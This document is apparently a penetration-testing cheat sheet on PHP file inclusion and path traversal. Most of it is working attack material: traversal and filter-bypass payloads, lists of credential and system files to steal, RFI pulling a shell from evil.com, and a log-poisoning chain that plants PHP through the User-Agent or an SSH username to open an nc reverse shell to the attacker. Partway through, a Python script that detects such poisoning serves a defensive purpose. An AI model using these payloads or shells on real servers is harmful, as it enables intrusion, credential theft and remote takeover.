LFI - RFI - Path traversal
Basic LFI, reading an arbitrary file (quote the URL so the shell does not expand ? and &):
curl --silent "http://localhost/index.php?file=/etc/subgid"
To read the source of a PHP file instead of executing it, wrap it with php://filter and base64-encode it:
http://localhost/file.php?file=php://filter/convert.base64-encode/resource=prueba.php
curl --silent "http://localhost/file.php?file=php://filter/convert.base64-encode/resource=prueba.php" | base64 -d 2>/dev/null
Basic traversal:
http://localhost/file.php?file=../../../../../etc/passwd
Appending ? (so that a suffix the code appends, such as .php, becomes a query string) only helps when the include target is a URL, i.e. in RFI; for a local file it changes nothing:
http://localhost/file.php?file=../../../../../etc/passwd?
Null byte injection (the %00 terminates the string, so anything the code appends after our value is dropped):
http://localhost/file.php?file=../../../../../etc/passwd%00
curl --silent "http://localhost/index.php?file=../../../../../../../../../etc/subgid%00"
(Null byte injection in file paths was fixed in PHP 5.3.4, so this only works on older versions.)
URL-encoding the slashes (bypasses filters that inspect the raw request; the server decodes the value before the include):
curl --silent "http://localhost/index.php?file=..%2F..%2F..%2F..%2F..%2Fetc/subgid"
Nested traversal (bypasses filters that delete ../ in a single, non-recursive pass: ....// becomes ../ after one deletion):
curl --silent "http://localhost/index.php?file=....//....//....//....//....//etc/subgid"
Double encoding (encode the % as well; works when the application URL-decodes the value a second time):
First encoding: %2E%2E%2Fetc%2Fpasswd
Second encoding: %252E%252E%252Fetc%252Fpasswd
Path truncation (PHP before 5.3): pad the path with ./ (or /.) until the whole string is longer than 4096 bytes (MAXPATHLEN). The end of the string, including any suffix the code appends such as .php, is cut off, so the request is effectively ../../../etc/passwd:
../../../../etc/passwd/././././././<...>/.php
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt
Interesting files (Linux):
/etc/issue
/etc/motd
/etc/passwd
/etc/group
/etc/resolv.conf
/etc/shadow
/home/[USERNAME]/.bash_history or .profile
~/.bash_history or .profile
$USER/.bash_history or .profile
/root/.bash_history or .profile
/etc/mtab
/etc/inetd.conf
/var/log/dmessage
.htaccess
config.php
authorized_keys
id_rsa
id_rsa.keystore
id_rsa.pub
known_hosts
/etc/httpd/logs/access_log
/etc/httpd/logs/error_log
/var/www/logs/access_log
/var/www/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access.log
/var/log/apache/access_log
/var/log/apache2/access_log
/var/log/apache/access.log
/var/log/apache2/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/var/log/access_log
/var/log/mail
/var/log/sshd.log
/var/log/vsftpd.log
.bash_history
.mysql_history
.my.cnf
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/net/fib_trie
/proc/version
/proc/self/environ
Interesting files (Windows):
c:\WINDOWS\system32\eula.txt
c:\boot.ini
c:\WINDOWS\win.ini
c:\WINNT\win.ini
c:\WINDOWS\Repair\SAM
c:\WINDOWS\php.ini
c:\WINNT\php.ini
c:\Program Files\Apache Group\Apache\conf\httpd.conf
c:\Program Files\Apache Group\Apache2\conf\httpd.conf
c:\Program Files\xampp\apache\conf\httpd.conf
c:\php\php.ini
c:\php5\php.ini
c:\php4\php.ini
c:\apache\php\php.ini
c:\xampp\apache\bin\php.ini
c:\home2\bin\stable\apache\php.ini
c:\home\bin\stable\apache\php.ini
c:\Program Files\Apache Group\Apache\logs\access.log
c:\Program Files\Apache Group\Apache\logs\error.log
c:\WINDOWS\TEMP\
c:\php\sessions\
c:\php5\sessions\
c:\php4\sessions\
windows\repair\SAM
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
RFI basic example (the include target is a URL, which requires allow_url_include=On in php.ini):
vuln.php?page=http://evil.com/shell.txt
Another example, the WordPress gwolle-gb plugin, whose abspath parameter is vulnerable to RFI:
http://192.168.1.X/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://{My IP}/wp-load.php
Useful wrappers:
php://filter (read source instead of executing it, e.g. php://filter/convert.base64-encode/resource=file.php)
zip:// (include a PHP file inside an uploaded zip: zip://archive.zip%23shell.php)
data:// (inline code, e.g. data://text/plain;base64,<base64 of PHP code>; needs allow_url_include=On)
expect:// (runs a command, e.g. expect://id; needs the expect extension, which is rarely installed)
php://input (executes the POST body as PHP; needs allow_url_include=On)
phar:// (like zip://, for phar archives)
Log poisoning
First find a log file that the vulnerable script can include, e.g. under /var/log:
/var/log/apache2/access.log
Then send a request whose User-Agent header is PHP code (-s silent, -H adds a request header):
curl -s -H "User-Agent: <?php system('whoami'); ?>" "http://localhost/example.php?file=/var/log/apache2/access.log"
Apache writes the User-Agent string into access.log; when the vulnerable script includes that file, the PHP inside it is interpreted and whoami runs on the server.
Poisoning /var/log/auth.log works the same way: sshd logs every authentication attempt including the username, so an SSH login with a username that is PHP code writes that code into the log. (auth.log is normally readable only by root and the adm group, so this only works where the web server user can read it.)
Which command to use for the shell depends on what is installed on the target; see the pentestmonkey reverse shell cheat sheet.
Start a listener on our machine:
nc -nlvp 443
Test the reverse shell command against our own machine first (this needs a netcat that supports -e, e.g. nc.traditional; the OpenBSD nc does not):
nc -e /bin/bash {our ip} 443
Base64-encode the command so that quotes and spaces cannot break the injected PHP string:
echo 'nc -e /bin/bash {our ip} 443' | base64; echo
On the target the reverse of that decodes and runs it:
echo {base64 string} | base64 -d | bash
Now inject the PHP as the SSH username (enter any wrong password; the failed attempt is what gets logged):
ssh '<?php system("echo {base64 string} | base64 -d | bash"); ?>'@{target}
Then include the log to execute it:
curl -s "http://{target}/example.php?file=/var/log/auth.log"
In the terminal running nc -nlvp 443 a shell appears; whoami confirms we are on the system, and script /dev/null -c bash gives a proper tty.
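From the defender's side, both poisoning paths leave a recognisable trace in the very logs they abuse. The following Python, added here as an example (not from the original page), scans Apache combined-format access.log lines and sshd auth.log lines for PHP tags in the User-Agent/Referer and in the SSH username, and for a request parameter pointing at a log file or /proc/self/environ (the second half of the chain). The log lines, IPs, host name and timestamps are constructed for the example.

```python
"""Detecting log poisoning attempts in access.log and auth.log.

Added example, not from the original page. The sample lines are constructed
to mirror the two poisoning paths described above; IPs, host and timestamps
are made up.
"""
import base64
import re

# Constructed: the base64-encoded reverse shell carried by the ssh username
# payload (IP and port are assumptions).
B64_CMD = base64.b64encode(b"nc -e /bin/bash 10.0.0.5 443").decode()

ACCESS_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET / HTTP/1.1" 200 512 "-" "<?php system(\'whoami\'); ?> "',
    '10.0.0.5 - - [10/Oct/2023:13:55:41 +0000] "GET /example.php?file=/var/log/apache2/access.log HTTP/1.1" 200 77 "-" "curl/8.0"',
    '10.0.0.5 - - [10/Oct/2023:13:56:02 +0000] "GET /index.php?file=..%252F..%252Fetc%252Fpasswd HTTP/1.1" 404 0 "-" "curl/8.0"',
]

AUTH_LOG = [
    'Oct 10 13:57:01 web sshd[1234]: Invalid user <?php system("echo ' + B64_CMD
    + ' | base64 -d | bash"); ?> from 10.0.0.5 port 51234',
    'Oct 10 13:57:05 web sshd[1234]: Failed password for invalid user admin from 10.0.0.5 port 51234 ssh2',
    'Oct 10 13:58:00 web sshd[1240]: Accepted publickey for deploy from 10.0.0.9 port 50000 ssh2',
]

# Apache combined log format. Apache escapes embedded quotes as \", which
# this simple pattern does not unescape.
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" \d{3} \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# sshd records the attempted username verbatim in "Invalid user ... from IP port N".
AUTH_RE = re.compile(r"sshd\[\d+\]: [Ii]nvalid user (?P<user>.+?) from \S+ port \d+")

PHP_TAG = re.compile(r"<\?(?:php\b|=)", re.I)
# A parameter value pointing at a log directory or /proc/self/environ.
LOG_TARGET = re.compile(r"[?&][^ \"=]+=[^ \"&]*(?:/var/log/|/proc/self/environ|/logs?/)", re.I)
# '..' (plain, %-encoded or %25-double-encoded) followed by a slash in any encoding.
TRAVERSAL = re.compile(r"(?:\.\.|%2e%2e|%252e%252e)(?:/|\\|%2f|%5c|%252f|%255c)", re.I)


def scan_access_log(lines):
    """Return (line number, finding) pairs for suspicious access.log lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = ACCESS_RE.match(line)
        if not m:
            continue  # not combined format; a real pipeline would count these
        if PHP_TAG.search(m["ua"]) or PHP_TAG.search(m["ref"]):
            findings.append((n, "php_tag_in_header"))
        if LOG_TARGET.search(m["req"]):
            findings.append((n, "log_or_proc_target"))
        if TRAVERSAL.search(m["req"]):
            findings.append((n, "encoded_traversal"))
    return findings


def scan_auth_log(lines):
    """Return (line number, finding) pairs for sshd lines whose username carries PHP."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = AUTH_RE.search(line)
        if m and PHP_TAG.search(m["user"]):
            findings.append((n, "php_tag_in_ssh_username"))
    return findings


def scan_all():
    """Findings over both sample logs, tagged with the log they came from."""
    return ([("access.log",) + f for f in scan_access_log(ACCESS_LOG)]
            + [("auth.log",) + f for f in scan_auth_log(AUTH_LOG)])


if __name__ == "__main__":
    for hit in scan_all():
        print(hit)
```

The poisoning request itself shows up as php_tag_in_header, the include that triggers it as log_or_proc_target, and the ssh attempt as php_tag_in_ssh_username; correlating those within a short window from one source IP is the alert. The traversal pattern deliberately matches the double-encoded form too, since that is the variant a raw-string filter misses.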
https://github.com/kurobeats/fimap
Single scan: test one URL for LFI and audit it (-s single target, -u URL):
fimap.py -s -u "http://target-site.com/index2.php?x="
Harvester mode: point it at the site root and it crawls the site looking for parameters to test (-d sets the crawl depth, -w writes the harvested URLs to a file):
fimap.py -H -u "http://target-site.com/" -w output.txt
To test RFI:
fimap.py --test-rfi
https://github.com/machine1337/lfiscan
https://github.com/wireghoul/dotdotpwn
Fuzz the traversal depth against a URL (-d maximum depth, -f file to look for, -b stop at the first hit, -k text that must appear in the response for a hit):
dotdotpwn -m http-url -d 10 -f /etc/passwd -u "{link extracted with paramspider or similar tool}=TRAVERSAL" -b -k "root:"
dotdotpwn -m http-url -d 10 -f /etc/shadow -u "{link extracted with paramspider or similar tool}=TRAVERSAL" -b -k "admin:"